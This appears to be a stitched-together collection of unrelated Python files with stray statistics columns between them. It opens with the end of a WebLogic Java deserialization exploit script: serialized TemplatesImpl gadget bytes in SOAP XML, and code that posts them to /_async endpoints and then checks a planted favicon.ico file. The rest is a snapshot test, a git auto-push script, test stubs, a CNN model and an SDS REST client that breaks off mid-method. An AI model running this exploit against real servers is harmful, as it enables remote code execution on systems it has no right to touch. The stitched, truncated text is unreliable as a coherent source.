<void index="3151"><byte>120</byte></void>
<void index="3152"><byte>121</byte></void>
<void index="3153"><byte>-31</byte></void>
<void index="3154"><byte>39</byte></void>
<void index="3155"><byte>-38</byte></void>
<void index="3156"><byte>32</byte></void>
<void index="3157"><byte>-52</byte></void>
<void index="3158"><byte>16</byte></void>
<void index="3159"><byte>67</byte></void>
<void index="3160"><byte>-53</byte></void>
<void index="3161"><byte>2</byte></void>
<void index="3162"><byte>0</byte></void>
<void index="3163"><byte>1</byte></void>
<void index="3164"><byte>76</byte></void>
<void index="3165"><byte>0</byte></void>
<void index="3166"><byte>1</byte></void>
<void index="3167"><byte>104</byte></void>
<void index="3168"><byte>116</byte></void>
<void index="3169"><byte>0</byte></void>
<void index="3170"><byte>37</byte></void>
<void index="3171"><byte>76</byte></void>
<void index="3172"><byte>106</byte></void>
<void index="3173"><byte>97</byte></void>
<void index="3174"><byte>118</byte></void>
<void index="3175"><byte>97</byte></void>
<void index="3176"><byte>47</byte></void>
<void index="3177"><byte>108</byte></void>
<void index="3178"><byte>97</byte></void>
<void index="3179"><byte>110</byte></void>
<void index="3180"><byte>103</byte></void>
<void index="3181"><byte>47</byte></void>
<void index="3182"><byte>114</byte></void>
<void index="3183"><byte>101</byte></void>
<void index="3184"><byte>102</byte></void>
<void index="3185"><byte>108</byte></void>
<void index="3186"><byte>101</byte></void>
<void index="3187"><byte>99</byte></void>
<void index="3188"><byte>116</byte></void>
<void index="3189"><byte>47</byte></void>
<void index="3190"><byte>73</byte></void>
<void index="3191"><byte>110</byte></void>
<void index="3192"><byte>118</byte></void>
<void index="3193"><byte>111</byte></void>
<void index="3194"><byte>99</byte></void>
<void index="3195"><byte>97</byte></void>
<void index="3196"><byte>116</byte></void>
<void index="3197"><byte>105</byte></void>
<void index="3198"><byte>111</byte></void>
<void index="3199"><byte>110</byte></void>
<void index="3200"><byte>72</byte></void>
<void index="3201"><byte>97</byte></void>
<void index="3202"><byte>110</byte></void>
<void index="3203"><byte>100</byte></void>
<void index="3204"><byte>108</byte></void>
<void index="3205"><byte>101</byte></void>
<void index="3206"><byte>114</byte></void>
<void index="3207"><byte>59</byte></void>
<void index="3208"><byte>120</byte></void>
<void index="3209"><byte>112</byte></void>
<void index="3210"><byte>115</byte></void>
<void index="3211"><byte>114</byte></void>
<void index="3212"><byte>0</byte></void>
<void index="3213"><byte>50</byte></void>
<void index="3214"><byte>115</byte></void>
<void index="3215"><byte>117</byte></void>
<void index="3216"><byte>110</byte></void>
<void index="3217"><byte>46</byte></void>
<void index="3218"><byte>114</byte></void>
<void index="3219"><byte>101</byte></void>
<void index="3220"><byte>102</byte></void>
<void index="3221"><byte>108</byte></void>
<void index="3222"><byte>101</byte></void>
<void index="3223"><byte>99</byte></void>
<void index="3224"><byte>116</byte></void>
<void index="3225"><byte>46</byte></void>
<void index="3226"><byte>97</byte></void>
<void index="3227"><byte>110</byte></void>
<void index="3228"><byte>110</byte></void>
<void index="3229"><byte>111</byte></void>
<void index="3230"><byte>116</byte></void>
<void index="3231"><byte>97</byte></void>
<void index="3232"><byte>116</byte></void>
<void index="3233"><byte>105</byte></void>
<void index="3234"><byte>111</byte></void>
<void index="3235"><byte>110</byte></void>
<void index="3236"><byte>46</byte></void>
<void index="3237"><byte>65</byte></void>
<void index="3238"><byte>110</byte></void>
<void index="3239"><byte>110</byte></void>
<void index="3240"><byte>111</byte></void>
<void index="3241"><byte>116</byte></void>
<void index="3242"><byte>97</byte></void>
<void index="3243"><byte>116</byte></void>
<void index="3244"><byte>105</byte></void>
<void index="3245"><byte>111</byte></void>
<void index="3246"><byte>110</byte></void>
<void index="3247"><byte>73</byte></void>
<void index="3248"><byte>110</byte></void>
<void index="3249"><byte>118</byte></void>
<void index="3250"><byte>111</byte></void>
<void index="3251"><byte>99</byte></void>
<void index="3252"><byte>97</byte></void>
<void index="3253"><byte>116</byte></void>
<void index="3254"><byte>105</byte></void>
<void index="3255"><byte>111</byte></void>
<void index="3256"><byte>110</byte></void>
<void index="3257"><byte>72</byte></void>
<void index="3258"><byte>97</byte></void>
<void index="3259"><byte>110</byte></void>
<void index="3260"><byte>100</byte></void>
<void index="3261"><byte>108</byte></void>
<void index="3262"><byte>101</byte></void>
<void index="3263"><byte>114</byte></void>
<void index="3264"><byte>85</byte></void>
<void index="3265"><byte>-54</byte></void>
<void index="3266"><byte>-11</byte></void>
<void index="3267"><byte>15</byte></void>
<void index="3268"><byte>21</byte></void>
<void index="3269"><byte>-53</byte></void>
<void index="3270"><byte>126</byte></void>
<void index="3271"><byte>-91</byte></void>
<void index="3272"><byte>2</byte></void>
<void index="3273"><byte>0</byte></void>
<void index="3274"><byte>2</byte></void>
<void index="3275"><byte>76</byte></void>
<void index="3276"><byte>0</byte></void>
<void index="3277"><byte>12</byte></void>
<void index="3278"><byte>109</byte></void>
<void index="3279"><byte>101</byte></void>
<void index="3280"><byte>109</byte></void>
<void index="3281"><byte>98</byte></void>
<void index="3282"><byte>101</byte></void>
<void index="3283"><byte>114</byte></void>
<void index="3284"><byte>86</byte></void>
<void index="3285"><byte>97</byte></void>
<void index="3286"><byte>108</byte></void>
<void index="3287"><byte>117</byte></void>
<void index="3288"><byte>101</byte></void>
<void index="3289"><byte>115</byte></void>
<void index="3290"><byte>116</byte></void>
<void index="3291"><byte>0</byte></void>
<void index="3292"><byte>15</byte></void>
<void index="3293"><byte>76</byte></void>
<void index="3294"><byte>106</byte></void>
<void index="3295"><byte>97</byte></void>
<void index="3296"><byte>118</byte></void>
<void index="3297"><byte>97</byte></void>
<void index="3298"><byte>47</byte></void>
<void index="3299"><byte>117</byte></void>
<void index="3300"><byte>116</byte></void>
<void index="3301"><byte>105</byte></void>
<void index="3302"><byte>108</byte></void>
<void index="3303"><byte>47</byte></void>
<void index="3304"><byte>77</byte></void>
<void index="3305"><byte>97</byte></void>
<void index="3306"><byte>112</byte></void>
<void index="3307"><byte>59</byte></void>
<void index="3308"><byte>76</byte></void>
<void index="3309"><byte>0</byte></void>
<void index="3310"><byte>4</byte></void>
<void index="3311"><byte>116</byte></void>
<void index="3312"><byte>121</byte></void>
<void index="3313"><byte>112</byte></void>
<void index="3314"><byte>101</byte></void>
<void index="3315"><byte>116</byte></void>
<void index="3316"><byte>0</byte></void>
<void index="3317"><byte>17</byte></void>
<void index="3318"><byte>76</byte></void>
<void index="3319"><byte>106</byte></void>
<void index="3320"><byte>97</byte></void>
<void index="3321"><byte>118</byte></void>
<void index="3322"><byte>97</byte></void>
<void index="3323"><byte>47</byte></void>
<void index="3324"><byte>108</byte></void>
<void index="3325"><byte>97</byte></void>
<void index="3326"><byte>110</byte></void>
<void index="3327"><byte>103</byte></void>
<void index="3328"><byte>47</byte></void>
<void index="3329"><byte>67</byte></void>
<void index="3330"><byte>108</byte></void>
<void index="3331"><byte>97</byte></void>
<void index="3332"><byte>115</byte></void>
<void index="3333"><byte>115</byte></void>
<void index="3334"><byte>59</byte></void>
<void index="3335"><byte>120</byte></void>
<void index="3336"><byte>112</byte></void>
<void index="3337"><byte>115</byte></void>
<void index="3338"><byte>114</byte></void>
<void index="3339"><byte>0</byte></void>
<void index="3340"><byte>17</byte></void>
<void index="3341"><byte>106</byte></void>
<void index="3342"><byte>97</byte></void>
<void index="3343"><byte>118</byte></void>
<void index="3344"><byte>97</byte></void>
<void index="3345"><byte>46</byte></void>
<void index="3346"><byte>117</byte></void>
<void index="3347"><byte>116</byte></void>
<void index="3348"><byte>105</byte></void>
<void index="3349"><byte>108</byte></void>
<void index="3350"><byte>46</byte></void>
<void index="3351"><byte>72</byte></void>
<void index="3352"><byte>97</byte></void>
<void index="3353"><byte>115</byte></void>
<void index="3354"><byte>104</byte></void>
<void index="3355"><byte>77</byte></void>
<void index="3356"><byte>97</byte></void>
<void index="3357"><byte>112</byte></void>
<void index="3358"><byte>5</byte></void>
<void index="3359"><byte>7</byte></void>
<void index="3360"><byte>-38</byte></void>
<void index="3361"><byte>-63</byte></void>
<void index="3362"><byte>-61</byte></void>
<void index="3363"><byte>22</byte></void>
<void index="3364"><byte>96</byte></void>
<void index="3365"><byte>-47</byte></void>
<void index="3366"><byte>3</byte></void>
<void index="3367"><byte>0</byte></void>
<void index="3368"><byte>2</byte></void>
<void index="3369"><byte>70</byte></void>
<void index="3370"><byte>0</byte></void>
<void index="3371"><byte>10</byte></void>
<void index="3372"><byte>108</byte></void>
<void index="3373"><byte>111</byte></void>
<void index="3374"><byte>97</byte></void>
<void index="3375"><byte>100</byte></void>
<void index="3376"><byte>70</byte></void>
<void index="3377"><byte>97</byte></void>
<void index="3378"><byte>99</byte></void>
<void index="3379"><byte>116</byte></void>
<void index="3380"><byte>111</byte></void>
<void index="3381"><byte>114</byte></void>
<void index="3382"><byte>73</byte></void>
<void index="3383"><byte>0</byte></void>
<void index="3384"><byte>9</byte></void>
<void index="3385"><byte>116</byte></void>
<void index="3386"><byte>104</byte></void>
<void index="3387"><byte>114</byte></void>
<void index="3388"><byte>101</byte></void>
<void index="3389"><byte>115</byte></void>
<void index="3390"><byte>104</byte></void>
<void index="3391"><byte>111</byte></void>
<void index="3392"><byte>108</byte></void>
<void index="3393"><byte>100</byte></void>
<void index="3394"><byte>120</byte></void>
<void index="3395"><byte>112</byte></void>
<void index="3396"><byte>63</byte></void>
<void index="3397"><byte>64</byte></void>
<void index="3398"><byte>0</byte></void>
<void index="3399"><byte>0</byte></void>
<void index="3400"><byte>0</byte></void>
<void index="3401"><byte>0</byte></void>
<void index="3402"><byte>0</byte></void>
<void index="3403"><byte>12</byte></void>
<void index="3404"><byte>119</byte></void>
<void index="3405"><byte>8</byte></void>
<void index="3406"><byte>0</byte></void>
<void index="3407"><byte>0</byte></void>
<void index="3408"><byte>0</byte></void>
<void index="3409"><byte>16</byte></void>
<void index="3410"><byte>0</byte></void>
<void index="3411"><byte>0</byte></void>
<void index="3412"><byte>0</byte></void>
<void index="3413"><byte>1</byte></void>
<void index="3414"><byte>116</byte></void>
<void index="3415"><byte>0</byte></void>
<void index="3416"><byte>8</byte></void>
<void index="3417"><byte>102</byte></void>
<void index="3418"><byte>53</byte></void>
<void index="3419"><byte>97</byte></void>
<void index="3420"><byte>53</byte></void>
<void index="3421"><byte>97</byte></void>
<void index="3422"><byte>54</byte></void>
<void index="3423"><byte>48</byte></void>
<void index="3424"><byte>56</byte></void>
<void index="3425"><byte>113</byte></void>
<void index="3426"><byte>0</byte></void>
<void index="3427"><byte>126</byte></void>
<void index="3428"><byte>0</byte></void>
<void index="3429"><byte>8</byte></void>
<void index="3430"><byte>120</byte></void>
<void index="3431"><byte>118</byte></void>
<void index="3432"><byte>114</byte></void>
<void index="3433"><byte>0</byte></void>
<void index="3434"><byte>29</byte></void>
<void index="3435"><byte>106</byte></void>
<void index="3436"><byte>97</byte></void>
<void index="3437"><byte>118</byte></void>
<void index="3438"><byte>97</byte></void>
<void index="3439"><byte>120</byte></void>
<void index="3440"><byte>46</byte></void>
<void index="3441"><byte>120</byte></void>
<void index="3442"><byte>109</byte></void>
<void index="3443"><byte>108</byte></void>
<void index="3444"><byte>46</byte></void>
<void index="3445"><byte>116</byte></void>
<void index="3446"><byte>114</byte></void>
<void index="3447"><byte>97</byte></void>
<void index="3448"><byte>110</byte></void>
<void index="3449"><byte>115</byte></void>
<void index="3450"><byte>102</byte></void>
<void index="3451"><byte>111</byte></void>
<void index="3452"><byte>114</byte></void>
<void index="3453"><byte>109</byte></void>
<void index="3454"><byte>46</byte></void>
<void index="3455"><byte>84</byte></void>
<void index="3456"><byte>101</byte></void>
<void index="3457"><byte>109</byte></void>
<void index="3458"><byte>112</byte></void>
<void index="3459"><byte>108</byte></void>
<void index="3460"><byte>97</byte></void>
<void index="3461"><byte>116</byte></void>
<void index="3462"><byte>101</byte></void>
<void index="3463"><byte>115</byte></void>
<void index="3464"><byte>0</byte></void>
<void index="3465"><byte>0</byte></void>
<void index="3466"><byte>0</byte></void>
<void index="3467"><byte>0</byte></void>
<void index="3468"><byte>0</byte></void>
<void index="3469"><byte>0</byte></void>
<void index="3470"><byte>0</byte></void>
<void index="3471"><byte>0</byte></void>
<void index="3472"><byte>0</byte></void>
<void index="3473"><byte>0</byte></void>
<void index="3474"><byte>0</byte></void>
<void index="3475"><byte>120</byte></void>
<void index="3476"><byte>112</byte></void>
<void index="3477"><byte>120</byte></void>
</array>
</void>
</array>
</java>
</work:WorkContext>
</soapenv:Header>
<soapenv:Body>
<asy:onAsyncDelivery/>
</soapenv:Body>
</soapenv:Envelope>
'''
headers = {
"Accept-Language":"zh-CN,zh;q=0.9,en;q=0.8",
"User-Agent":ua,
"Content-Type":"text/xml"
}
def run(rip,rport):
r1 = requests.post('http://' + str(rip) + ':' + str(rport) + path1, headers=headers, data=payload1, timeout=3)
time.sleep(1)
r2 = requests.post('http://' + str(rip) + ':' + str(rport) + path2, headers=headers, data=payload2, timeout=3)
time.sleep(1)
r3 = requests.get('http://' + str(rip) + ':' + str(rport) + '/_async/favicon.ico')
if ((r1.status_code == 200) and 'uid' in r1.text) or ((r2.status_code == 202) and 'Vulnerable' in r3.text):
return (1, '[+] [{}] weblogic has a JAVA deserialization vulnerability:{}'.format(rip + ':' + str(rport), VUL[0]))
else:
return (0, '[-] [{}] weblogic not detected {}'.format(rip + ':' + str(rport), VUL[0]))
if __name__ == '__main__':
dip = sys.argv[1]
dport = int(sys.argv[2])
run(dip,dport)
| 100.285474
| 205,599
| 0.644277
| 59,746
| 357,618
| 3.854919
| 0.08583
| 0.331683
| 0.44214
| 0.626366
| 0.970949
| 0.970714
| 0.12502
| 0.124759
| 0.124759
| 0.124759
| 0
| 0.147846
| 0.044665
| 357,618
| 3,566
| 205,600
| 100.285474
| 0.526292
| 0.000839
| 0
| 0.010443
| 0
| 0.001976
| 0.997589
| 0.911249
| 0
| 0
| 0
| 0
| 0
| 1
| 0.000282
| false
| 0
| 0.001129
| 0
| 0.001976
| 0
| 0
| 0
| 0
| null | 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 1
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 9
|
c7a83681a3652bcad54bbe3eaf86dff3d2e1b78b
| 1,690
|
py
|
Python
|
notification_importers/tests/snapshots/snap_test_notification_google_sheet_importer.py
|
City-of-Helsinki/palvelutarjotin
|
4ad67cbf4062832aba8080cb96ac785bdbbe9aa8
|
[
"MIT"
] | 2
|
2020-11-10T16:31:26.000Z
|
2021-02-19T10:33:27.000Z
|
notification_importers/tests/snapshots/snap_test_notification_google_sheet_importer.py
|
City-of-Helsinki/palvelutarjotin
|
4ad67cbf4062832aba8080cb96ac785bdbbe9aa8
|
[
"MIT"
] | 239
|
2020-04-23T07:36:17.000Z
|
2022-03-15T08:38:38.000Z
|
notification_importers/tests/snapshots/snap_test_notification_google_sheet_importer.py
|
City-of-Helsinki/palvelutarjotin
|
4ad67cbf4062832aba8080cb96ac785bdbbe9aa8
|
[
"MIT"
] | null | null | null |
# -*- coding: utf-8 -*-
# snapshottest: v1 - https://goo.gl/zC4yUc
from __future__ import unicode_literals
from snapshottest import Snapshot
snapshots = Snapshot()
snapshots[
"test_create_non_existing_and_update_existing_notifications 1"
] = """enrolment_approved|enrolment_approved fi updated subject|enrolment_approved en updated subject|enrolment_approved sv updated subject|enrolment_approved fi updated body_text|enrolment_approved en updated body_text|enrolment_approved sv updated body_text|||
occurrence_enrolment|occurrence_enrolment fi updated subject|occurrence_enrolment en updated subject|occurrence_enrolment sv updated subject|occurrence_enrolment fi updated body_text|occurrence_enrolment en updated body_text|occurrence_enrolment sv updated body_text|||"""
snapshots[
"test_create_non_existing_notifications 1"
] = """enrolment_approved|enrolment_approved fi original subject|enrolment_approved en original subject|enrolment_approved sv original subject|enrolment_approved fi original body_text|enrolment_approved en original body_text|enrolment_approved sv original body_text|||
occurrence_enrolment|occurrence_enrolment fi updated subject|occurrence_enrolment en updated subject|occurrence_enrolment sv updated subject|occurrence_enrolment fi updated body_text|occurrence_enrolment en updated body_text|occurrence_enrolment sv updated body_text|||"""
snapshots[
"test_update_notifications 1"
] = "enrolment_approved|enrolment_approved fi updated subject|enrolment_approved en updated subject|enrolment_approved sv updated subject|enrolment_approved fi updated body_text|enrolment_approved en updated body_text|enrolment_approved sv updated body_text|||"
| 76.818182
| 272
| 0.856805
| 217
| 1,690
| 6.359447
| 0.16129
| 0.258696
| 0.130435
| 0.134783
| 0.823913
| 0.744928
| 0.744928
| 0.744928
| 0.697101
| 0.697101
| 0
| 0.003891
| 0.087574
| 1,690
| 21
| 273
| 80.47619
| 0.891051
| 0.036686
| 0
| 0.357143
| 0
| 0.357143
| 0.884923
| 0.617846
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| false
| 0
| 0.142857
| 0
| 0.142857
| 0
| 0
| 0
| 0
| null | 1
| 0
| 0
| 1
| 1
| 1
| 1
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 1
| 1
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 9
|
c7b8acdd3370e337e8d3cc4e74982bfc51053ac6
| 678
|
py
|
Python
|
updateSite.py
|
letsgoexploring/miscellaneous-python-code
|
20e0b4f87ec7cdbcd7a7b44f236ce9b71f7cf0ee
|
[
"MIT"
] | null | null | null |
updateSite.py
|
letsgoexploring/miscellaneous-python-code
|
20e0b4f87ec7cdbcd7a7b44f236ce9b71f7cf0ee
|
[
"MIT"
] | null | null | null |
updateSite.py
|
letsgoexploring/miscellaneous-python-code
|
20e0b4f87ec7cdbcd7a7b44f236ce9b71f7cf0ee
|
[
"MIT"
] | null | null | null |
import os
try:
os.chdir("/Users/brianjenkins/dropbox/github/teaching")
os.system("git add -A")
os.system("git commit -m \"automatic update\"")
os.system("git push")
os.chdir("/Users/brianjenkins/dropbox/github/data")
os.system("git add -A")
os.system("git commit -m \"automatic update\"")
os.system("git push")
except:
os.chdir("/Users/bcjenkin/dropbox/github/teaching")
os.system("git add -A")
os.system("git commit -m \"automatic update\"")
os.system("git push")
os.chdir("/Users/bcjenkin/dropbox/github/data")
os.system("git add -A")
os.system("git commit -m \"automatic update\"")
os.system("git push")
| 29.478261
| 59
| 0.638643
| 96
| 678
| 4.510417
| 0.21875
| 0.221709
| 0.30485
| 0.12933
| 0.960739
| 0.960739
| 0.812933
| 0.812933
| 0.812933
| 0.812933
| 0
| 0
| 0.175516
| 678
| 23
| 60
| 29.478261
| 0.774598
| 0
| 0
| 0.631579
| 0
| 0
| 0.424153
| 0.22975
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| true
| 0
| 0.052632
| 0
| 0.052632
| 0
| 0
| 0
| 0
| null | 1
| 1
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
|
0
| 9
|
c7dbec119983a08116764fa60b4e2e2e2618c232
| 1,952
|
py
|
Python
|
tests/unit/database/test_database.py
|
matthewgdv/sqlhandler
|
b82fd159195f6bb63175bb8a8d81fc421e7d5835
|
[
"MIT"
] | null | null | null |
tests/unit/database/test_database.py
|
matthewgdv/sqlhandler
|
b82fd159195f6bb63175bb8a8d81fc421e7d5835
|
[
"MIT"
] | null | null | null |
tests/unit/database/test_database.py
|
matthewgdv/sqlhandler
|
b82fd159195f6bb63175bb8a8d81fc421e7d5835
|
[
"MIT"
] | null | null | null |
# import pytest
class TestDatabase:
def test___call__(self): # synced
assert True
def test_default_schema(self): # synced
assert True
def test_schema_names(self): # synced
assert True
def test_table_names(self): # synced
assert True
def test_view_names(self): # synced
assert True
def test_create_table(self): # synced
assert True
def test_drop_table(self): # synced
assert True
def test_refresh_table(self): # synced
assert True
def test_exists_table(self): # synced
assert True
def test_reset(self): # synced
assert True
def test__get_metadata(self): # synced
assert True
def test__cache_metadata(self): # synced
assert True
def test__post_reshape_soon(self): # synced
assert True
def test__sync_with_db(self): # synced
assert True
def test__reflect_database(self): # synced
assert True
def test__reflect_schema(self): # synced
assert True
def test__reflect_object(self): # synced
assert True
def test__autoload_models(self): # synced
assert True
def test_cls_instrument(self): # synced
assert True
def test__remove_expired_metadata_objects(self): # synced
assert True
def test__remove_object_if_exists(self): # synced
assert True
def test__name_from_object(self): # synced
assert True
def test__normalize_table(self): # synced
assert True
def test__table_name(self): # synced
assert True
def test_table_name(self): # synced
assert True
def test__scalar_name(self): # synced
assert True
def test_scalar_name(self): # synced
assert True
def test__collection_name(self): # synced
assert True
def test_collection_name(self): # synced
assert True
| 21.450549
| 62
| 0.639344
| 241
| 1,952
| 4.838174
| 0.190871
| 0.174099
| 0.397942
| 0.497427
| 0.823328
| 0.823328
| 0.707547
| 0.212693
| 0.212693
| 0.212693
| 0
| 0
| 0.300205
| 1,952
| 90
| 63
| 21.688889
| 0.853587
| 0.110656
| 0
| 0.491525
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.491525
| 1
| 0.491525
| false
| 0
| 0
| 0
| 0.508475
| 0
| 0
| 0
| 0
| null | 0
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 0
| 1
| 0
| 0
| 0
| 0
| 1
| 0
|
0
| 8
|
1bea211d9508477c8b9d4c53639b655123df5f08
| 1,669
|
py
|
Python
|
cnn.py
|
KiLJ4EdeN/signal_models
|
ebb607bb9e94d6a0913716e4fb1ca7dde4b692c3
|
[
"MIT"
] | null | null | null |
cnn.py
|
KiLJ4EdeN/signal_models
|
ebb607bb9e94d6a0913716e4fb1ca7dde4b692c3
|
[
"MIT"
] | null | null | null |
cnn.py
|
KiLJ4EdeN/signal_models
|
ebb607bb9e94d6a0913716e4fb1ca7dde4b692c3
|
[
"MIT"
] | null | null | null |
import tensorflow as tf
inputs = tf.keras.layers.Input(shape=(2000, 1))
x = tf.keras.layers.Conv1D(filters=2, kernel_size=15, padding='valid')(inputs)
x = tf.keras.layers.Conv1D(filters=2, kernel_size=15, padding='valid')(x)
x = tf.keras.layers.MaxPooling1D(pool_size=2)(x)
x = tf.keras.layers.Conv1D(filters=4, kernel_size=13, padding='valid')(x)
x = tf.keras.layers.Conv1D(filters=4, kernel_size=13, padding='valid')(x)
x = tf.keras.layers.MaxPooling1D(pool_size=2)(x)
x = tf.keras.layers.Conv1D(filters=8, kernel_size=11, padding='valid')(x)
x = tf.keras.layers.Conv1D(filters=8, kernel_size=11, padding='valid')(x)
x = tf.keras.layers.MaxPooling1D(pool_size=2)(x)
x = tf.keras.layers.Conv1D(filters=16, kernel_size=9, padding='valid')(x)
x = tf.keras.layers.Conv1D(filters=16, kernel_size=9, padding='valid')(x)
x = tf.keras.layers.MaxPooling1D(pool_size=2)(x)
x = tf.keras.layers.Conv1D(filters=24, kernel_size=7, padding='valid')(x)
x = tf.keras.layers.Conv1D(filters=24, kernel_size=7, padding='valid')(x)
x = tf.keras.layers.MaxPooling1D(pool_size=2)(x)
x = tf.keras.layers.Conv1D(filters=36, kernel_size=5, padding='valid')(x)
x = tf.keras.layers.Conv1D(filters=36, kernel_size=5, padding='valid')(x)
x = tf.keras.layers.MaxPooling1D(pool_size=2)(x)
x = tf.keras.layers.Conv1D(filters=48, kernel_size=3, padding='valid')(x)
x = tf.keras.layers.Conv1D(filters=48, kernel_size=3, padding='valid')(x)
x = tf.keras.layers.GlobalAveragePooling1D()(x)
x = tf.keras.layers.Flatten()(x)
x = tf.keras.layers.Dense(1, activation='sigmoid')(x)
model = tf.keras.models.Model(inputs=inputs,
outputs=x, name='cnn-1d')
print(model.summary())
| 52.15625
| 78
| 0.720791
| 284
| 1,669
| 4.165493
| 0.165493
| 0.147929
| 0.263736
| 0.272189
| 0.846154
| 0.820795
| 0.820795
| 0.820795
| 0.820795
| 0.820795
| 0
| 0.049869
| 0.086878
| 1,669
| 31
| 79
| 53.83871
| 0.726378
| 0
| 0
| 0.642857
| 0
| 0
| 0.04973
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| false
| 0
| 0.035714
| 0
| 0.035714
| 0.035714
| 0
| 0
| 0
| null | 0
| 1
| 1
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 8
|
40163c37b269ff674b40494efc1a1b6d1b5431f6
| 48,412
|
py
|
Python
|
basic_samples/SDS/Python/SDSPy/Python2/SdsClient.py
|
hanhossain/OCS-Samples
|
6f0f7878e6d9bccc32b6d663446678e070859d14
|
[
"Apache-2.0"
] | null | null | null |
basic_samples/SDS/Python/SDSPy/Python2/SdsClient.py
|
hanhossain/OCS-Samples
|
6f0f7878e6d9bccc32b6d663446678e070859d14
|
[
"Apache-2.0"
] | null | null | null |
basic_samples/SDS/Python/SDSPy/Python2/SdsClient.py
|
hanhossain/OCS-Samples
|
6f0f7878e6d9bccc32b6d663446678e070859d14
|
[
"Apache-2.0"
] | null | null | null |
# SdsClient.py
#
# Copyright (C) 2018 OSIsoft, LLC. All rights reserved.
#
# THIS SOFTWARE CONTAINS CONFIDENTIAL INFORMATION AND TRADE SECRETS OF
# OSIsoft, LLC. USE, DISCLOSURE, OR REPRODUCTION IS PROHIBITED WITHOUT
# THE PRIOR EXPRESS WRITTEN PERMISSION OF OSIsoft, LLC.
#
# RESTRICTED RIGHTS LEGEND
# Use, duplication, or disclosure by the Government is subject to restrictions
# as set forth in subparagraph (c)(1)(ii) of the Rights in Technical Data and
# Computer Software clause at DFARS 252.227.7013
#
# OSIsoft, LLC
# 1600 Alvarado St, San Leandro, CA 94577
import urlparse
import json
import adal as adal
from SdsError import SdsError
from SdsType import SdsType
from SdsStream import SdsStream
from SdsStreamView import SdsStreamView
from SdsStreamViewMap import SdsStreamViewMap
from SdsBoundaryType import SdsBoundaryType
from Dataview import Dataview
from Datagroup import Datagroup
import requests
import time
class SdsClient(object):
"""Handles communication with Sds Service"""
def __init__(self, apiVersion, tenant, url, resource, authority, clientId, clientSecret):
self.__apiVersion = apiVersion
self.__tenant = tenant
self.__url = url
self.__resource = resource
self.__clientId = clientId
self.__clientSecret = clientSecret
self.__authority = authority
self.__token = ""
self.__expiration = 0
self.__getToken()
self.__setPathAndQueryTemplates()
@property
def Uri(self):
return self.__url
def getType(self, namespace_id, type_id):
"""Retrieves the type specified by 'type_id' from Sds Service"""
if namespace_id is None:
raise TypeError
if type_id is None:
raise TypeError
response = requests.get(
self.__url + self.__typesPath.format(api_version=self.__apiVersion, tenant_id=self.__tenant, namespace_id=namespace_id, type_id=type_id),
headers=self.__sdsHeaders())
if response.status_code < 200 or response.status_code >= 300:
response.close()
raise SdsError("Failed to get SdsType, {type_id}. {status}:{reason}".
format(type_id=type_id, status=response.status_code, reason=response.text))
type = SdsType.fromJson(json.loads(response.content))
response.close()
return type
def getTypeReferenceCount(self, namespace_id, type_id):
"""Retrieves the number of times the type is referenced"""
if namespace_id is None:
raise TypeError
if type_id is None:
raise TypeError
response = requests.get(
self.__url + self.__typesPath.format(api_version=self.__apiVersion, tenant_id=self.__tenant, namespace_id=namespace_id, type_id=type_id) + "/ReferenceCount",
headers=self.__sdsHeaders())
if response.status_code < 200 or response.status_code >= 300:
response.close()
raise SdsError("Failed to get SdsType reference count, {type_id}. {status}:{reason}".
format(type_id=type_id, status=response.status_code, reason=response.text))
count = json.loads(response.content)
response.close()
return int(count)
def getTypes(self, namespace_id, skip=0, count=100):
"""Retrieves a list of types associated with the specified 'namespace_id' under the current tenant"""
if namespace_id is None:
raise TypeError
response = requests.get(
self.__url + self.__getTypesPath.format(api_version=self.__apiVersion, tenant_id=self.__tenant, namespace_id=namespace_id, skip=skip, count=count),
headers=self.__sdsHeaders())
if response.status_code < 200 or response.status_code >= 300:
response.close()
raise SdsError("Failed to get all SdsTypes. {status}:{reason}".
format(status=response.status_code, reason=response.text))
types = json.loads(response.content)
results = []
for t in types:
results.append(SdsType.fromJson(t))
response.close()
return results
def getOrCreateType(self, namespace_id, type):
"""Tells Sds Service to create a type based on local 'type' or get if existing type matches"""
if namespace_id is None:
raise TypeError
if type is None or not isinstance(type, SdsType):
raise TypeError
response = requests.post(
self.__url + self.__typesPath.format(api_version=self.__apiVersion, tenant_id=self.__tenant, namespace_id=namespace_id, type_id=type.Id),
data=type.toJson(),
headers=self.__sdsHeaders())
if response.status_code < 200 or response.status_code >= 300:
response.close()
raise SdsError(
"Failed to create type, {type_id}. {status}:{reason}".format(type_id=type.Id, status=response.status_code, reason=response.text))
type = SdsType.fromJson(json.loads(response.content))
response.close()
return type
def createOrUpdateType(self, namespace_id, type):
"""Tells Sds Service to create a type based on local 'type' object"""
if namespace_id is None:
raise TypeError
if type is None or not isinstance(type, SdsType):
raise TypeError
response = requests.put(
self.__url + self.__typesPath.format(api_version=self.__apiVersion, tenant_id=self.__tenant, namespace_id=namespace_id, type_id=type.Id),
data=type.toJson(), headers=self.__sdsHeaders())
if response.status_code < 200 or response.status_code >= 300:
response.close()
raise SdsError(
"Failed to create type, {type_id}. {status}:{reason}".format(type_id=type.Id, status=response.status_code, reason=response.text))
response.close()
def deleteType(self, namespace_id, type_id):
